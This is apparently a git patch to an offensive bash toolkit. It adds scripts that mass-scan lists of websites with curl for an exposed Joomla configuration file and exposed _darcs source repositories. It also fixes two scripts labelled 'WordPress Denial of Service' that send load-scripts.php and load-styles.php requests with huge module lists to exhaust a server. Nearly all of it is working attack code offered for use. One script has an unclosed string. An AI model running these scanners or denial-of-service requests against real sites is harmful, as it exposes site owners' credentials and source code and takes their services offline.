From 47e928a2b7ee23cb25c0a56803e8319f1856263f Mon Sep 17 00:00:00 2001 From: Muhammad Daffa Date: Sat, 15 Oct 2022 13:22:03 +0700 Subject: [PATCH] feat: added some bash files --- Mass Find Configuration File/joomla.sh | 18 ++++++++++++++++++ Mass Find Source Code/darcs.sh | 20 ++++++++++++++++++++ Mass Find Source Code/git.sh | 2 +- Mass Find Source Code/subversion.sh | 2 +- WordPress Denial of Service/load-scripts.sh | 3 ++- WordPress Denial of Service/load-styles.sh | 2 +- 6 files changed, 43 insertions(+), 4 deletions(-) create mode 100644 Mass Find Configuration File/joomla.sh create mode 100644 Mass Find Source Code/darcs.sh diff --git a/Mass Find Configuration File/joomla.sh b/Mass Find Configuration File/joomla.sh new file mode 100644 index 0000000..fcc6c6c --- /dev/null +++ b/Mass Find Configuration File/joomla.sh @@ -0,0 +1,18 @@ +#!/bin/bash +# Find Joomla Configuration File Mass Scanner +LISTS=$1 + +if [[ ! -f ${LISTS} ]]; then + echo "ERROR: ${LISTS} not found" + echo "usage: bash $0 list.txt" + exit +fi + +for SITE in $(cat $LISTS); +do + if [[ $(curl --connect-timeout 3 --max-time 3 -kLs "${SITE}/configuration.php-dist" ) =~ '$dbtype' ]]; then + echo -e "\e[32m[+] FOUND: ${SITE}/configuration.php-dist" + else + echo -e "\e[31m[-] NOT FOUND: ${SITE}" + fi +done diff --git a/Mass Find Source Code/darcs.sh b/Mass Find Source Code/darcs.sh new file mode 100644 index 0000000..7242835 --- /dev/null +++ b/Mass Find Source Code/darcs.sh @@ -0,0 +1,20 @@ +#!/bin/bash + +# _darcs Mass Scanner +LISTS=$1 + +if [[ ! -f ${LISTS} ]]; then + echo "ERROR: ${LISTS} not found" + echo "usage: bash $0 list.txt" + exit +fi + +for SITE in $(cat $LISTS); +do + if [[ $(curl --connect-timeout 3 --max-time 3 -kLs "${SITE}/_darcs/prefs/binaries" ) =~ 'Binary file regexps' ]]; then + echo -e "\e[32m[+] FOUND: ${SITE}_darcs + else + echo -e "\e[31m[-] NOT FOUND: ${SITE}" + fi + +done diff --git a/Mass Find Source Code/git.sh b/Mass Find Source Code/git.sh index 3be1cd3..e11e9df 100644 --- a/Mass Find Source Code/git.sh +++ b/Mass Find Source Code/git.sh @@ -1,5 +1,5 @@ #!/bin/bash -# .git Checker +# .git Mass Scanner LISTS=$1 if [[ ! -f ${LISTS} ]]; then diff --git a/Mass Find Source Code/subversion.sh b/Mass Find Source Code/subversion.sh index d37daea..4373c87 100644 --- a/Mass Find Source Code/subversion.sh +++ b/Mass Find Source Code/subversion.sh @@ -1,5 +1,5 @@ #!/bin/bash -# .svn Checker +# .svn Mass Scanner LISTS=$1 if [[ ! -f ${LISTS} ]]; then diff --git a/WordPress Denial of Service/load-scripts.sh b/WordPress Denial of Service/load-scripts.sh index e7c64e9..b099953 100644 --- a/WordPress Denial of Service/load-scripts.sh +++ b/WordPress Denial of Service/load-scripts.sh @@ -4,7 +4,8 @@ echo "Input Website!" read web function dos(){ - if [[ $(curl -kLs "${web}/wp-admin/load-scripts.php?load=react,react-dom,moment,lodash,wp-polyfill-fetch,wp-polyfill-formdata,wp-polyfill-node-contains,wp-polyfill-url,wp-polyfill-dom-rect,wp-polyfill-element-closest,wp-polyfill,wp-block-library,wp-edit-post,wp-i18n,wp-hooks,wp-api-fetch,wp-data,wp-date,editor,colorpicker,media,wplink,link,utils,common,wp-sanitize,sack,quicktags,clipboard,wp-ajax-response,wp-api-request,wp-pointer,autosave,heartbeat,wp-auth-check,wp-lists,cropper,jquery,jquery-core,jquery-migrate,jquery-ui-core,jquery-effects-core,jquery-effects-blind,jquery-effects-bounce,jquery-effects-clip,jquery-effects-drop,jquery-effects-explode,jquery-effects-fade,jquery-effects-fold,jquery-effects-highlight,jquery-effects-puff,jquery-effects-pulsate,jquery-effects-scale,jquery-effects-shake,jquery-effects-size,jquery-effects-slide,jquery-effects-transfer,jquery-ui-accordion,jquery-ui-autocomplete,jquery-ui-button,jquery-ui-datepicker,jquery-ui-dialog,jquery-ui-draggable,jquery-ui-droppable,jquery-ui-menu,jquery-ui-mouse,jquery-ui-position,jquery-ui-progressbar,jquery-ui-resizable,jquery-ui-selectable,jquery-ui-selectmenu,jquery-ui-slider,jquery-ui-sortable,jquery-ui-spinner,jquery-ui-tabs,jquery-ui-tooltip,jquery-ui-widget,jquery-form,jquery-color,schedule,jquery-query,jquery-serialize-object,jquery-hotkeys,jquery-table-hotkeys,jquery-touch-punch,suggest,imagesloaded,masonry,jquery-masonry,thickbox,jcrop,swfobject,moxiejs,plupload,plupload-handlers,wp-plupload,swfupload,swfupload-all,swfupload-handlers,comment-reply,json2,underscore,backbone,wp-util,wp-backbone,revisions,imgareaselect,mediaelement,mediaelement-core,mediaelement-migrate,mediaelement-vimeo,wp-mediaelement,wp-codemirror,csslint,esprima,jshint,jsonlint,htmlhint,htmlhint-kses,code-editor,wp-theme-plugin-editor,wp-playlist,zxcvbn-async,password-strength-meter,user-profile,language-chooser,user-suggest,admin-bar,wplink,wpdialogs,word-count,media-upload,hoverIntent,hoverintent-js,customize-base,customize-loader,customize-preview,customize-models,customize-views,customize-controls,customize-selective-refresh,customize-widgets,customize-preview-widgets,customize-nav-menus,customize-preview-nav-menus,wp-custom-header,accordion,shortcode,media-models,wp-embed,media-views,media-editor,media-audiovideo,mce-view,wp-api,admin-tags,admin-comments,xfn,postbox,tags-box,tags-suggest,post,editor-expand,link,comment,admin-gallery,admin-widgets,media-widgets,media-audio-widget,media-image-widget,media-gallery-widget,media-video-widget,text-widgets,custom-html-widgets,theme,inline-edit-post,inline-edit-tax,plugin-install,site-health,privacy-tools,updates,farbtastic,iris,wp-color-picker,dashboard,list-revisions,media-grid,media,image-edit,set-post-thumbnail,nav-menu,custom-header,custom-background,media-gallery,svg-painter printf "Success\n" + if [[ $(curl -kLs "${web}/wp-admin/load-scripts.php?load=react,react-dom,moment,lodash,wp-polyfill-fetch,wp-polyfill-formdata,wp-polyfill-node-contains,wp-polyfill-url,wp-polyfill-dom-rect,wp-polyfill-element-closest,wp-polyfill,wp-block-library,wp-edit-post,wp-i18n,wp-hooks,wp-api-fetch,wp-data,wp-date,editor,colorpicker,media,wplink,link,utils,common,wp-sanitize,sack,quicktags,clipboard,wp-ajax-response,wp-api-request,wp-pointer,autosave,heartbeat,wp-auth-check,wp-lists,cropper,jquery,jquery-core,jquery-migrate,jquery-ui-core,jquery-effects-core,jquery-effects-blind,jquery-effects-bounce,jquery-effects-clip,jquery-effects-drop,jquery-effects-explode,jquery-effects-fade,jquery-effects-fold,jquery-effects-highlight,jquery-effects-puff,jquery-effects-pulsate,jquery-effects-scale,jquery-effects-shake,jquery-effects-size,jquery-effects-slide,jquery-effects-transfer,jquery-ui-accordion,jquery-ui-autocomplete,jquery-ui-button,jquery-ui-datepicker,jquery-ui-dialog,jquery-ui-draggable,jquery-ui-droppable,jquery-ui-menu,jquery-ui-mouse,jquery-ui-position,jquery-ui-progressbar,jquery-ui-resizable,jquery-ui-selectable,jquery-ui-selectmenu,jquery-ui-slider,jquery-ui-sortable,jquery-ui-spinner,jquery-ui-tabs,jquery-ui-tooltip,jquery-ui-widget,jquery-form,jquery-color,schedule,jquery-query,jquery-serialize-object,jquery-hotkeys,jquery-table-hotkeys,jquery-touch-punch,suggest,imagesloaded,masonry,jquery-masonry,thickbox,jcrop,swfobject,moxiejs,plupload,plupload-handlers,wp-plupload,swfupload,swfupload-all,swfupload-handlers,comment-reply,json2,underscore,backbone,wp-util,wp-backbone,revisions,imgareaselect,mediaelement,mediaelement-core,mediaelement-migrate,mediaelement-vimeo,wp-mediaelement,wp-codemirror,csslint,esprima,jshint,jsonlint,htmlhint,htmlhint-kses,code-editor,wp-theme-plugin-editor,wp-playlist,zxcvbn-async,password-strength-meter,user-profile,language-chooser,user-suggest,admin-bar,wplink,wpdialogs,word-count,media-upload,hoverIntent,hoverintent-js,customize-base,customize-loader,customize-preview,customize-models,customize-views,customize-controls,customize-selective-refresh,customize-widgets,customize-preview-widgets,customize-nav-menus,customize-preview-nav-menus,wp-custom-header,accordion,shortcode,media-models,wp-embed,media-views,media-editor,media-audiovideo,mce-view,wp-api,admin-tags,admin-comments,xfn,postbox,tags-box,tags-suggest,post,editor-expand,link,comment,admin-gallery,admin-widgets,media-widgets,media-audio-widget,media-image-widget,media-gallery-widget,media-video-widget,text-widgets,custom-html-widgets,theme,inline-edit-post,inline-edit-tax,plugin-install,site-health,privacy-tools,updates,farbtastic,iris,wp-color-picker,dashboard,list-revisions,media-grid,media,image-edit,set-post-thumbnail,nav-menu,custom-header,custom-background,media-gallery,svg-painter" ) =~ 'function()' ]]; then + printf "Success\n" else printf "Failed\n" fi diff --git a/WordPress Denial of Service/load-styles.sh b/WordPress Denial of Service/load-styles.sh index f9aa7b6..06f245a 100644 --- a/WordPress Denial of Service/load-styles.sh +++ b/WordPress Denial of Service/load-styles.sh @@ -4,7 +4,7 @@ echo "Input Website!" read web function dos(){ - if [[ $(curl -kLs "${1}/wp-admin/load-styles.php?&load=common,forms,admin-menu,dashboard,list-tables,edit,revisions,media,themes,about,nav-menus,widgets,site-icon,l10n,install,wp-color-picker,customize-controls,customize-widgets,customize-nav-menus,customize-preview,ie,login,site-health,buttons,admin-bar,wp-auth-check,editor-buttons,media-views,wp-pointer,wp-jquery-ui-dialog,wp-block-library-theme,wp-edit-blocks,wp-block-editor,wp-block-library,wp-components,wp-edit-post,wp-editor,wp-format-library,wp-list-reusable-blocks,wp-nux,deprecated-media,farbtastic" ) =~ 'wpadminbar' ]]; then + if [[ $(curl -kLs "${web}/wp-admin/load-styles.php?&load=common,forms,admin-menu,dashboard,list-tables,edit,revisions,media,themes,about,nav-menus,widgets,site-icon,l10n,install,wp-color-picker,customize-controls,customize-widgets,customize-nav-menus,customize-preview,ie,login,site-health,buttons,admin-bar,wp-auth-check,editor-buttons,media-views,wp-pointer,wp-jquery-ui-dialog,wp-block-library-theme,wp-edit-blocks,wp-block-editor,wp-block-library,wp-components,wp-edit-post,wp-editor,wp-format-library,wp-list-reusable-blocks,wp-nux,deprecated-media,farbtastic" ) =~ 'wpadminbar' ]]; then printf "Success\n" else printf "Failed\n"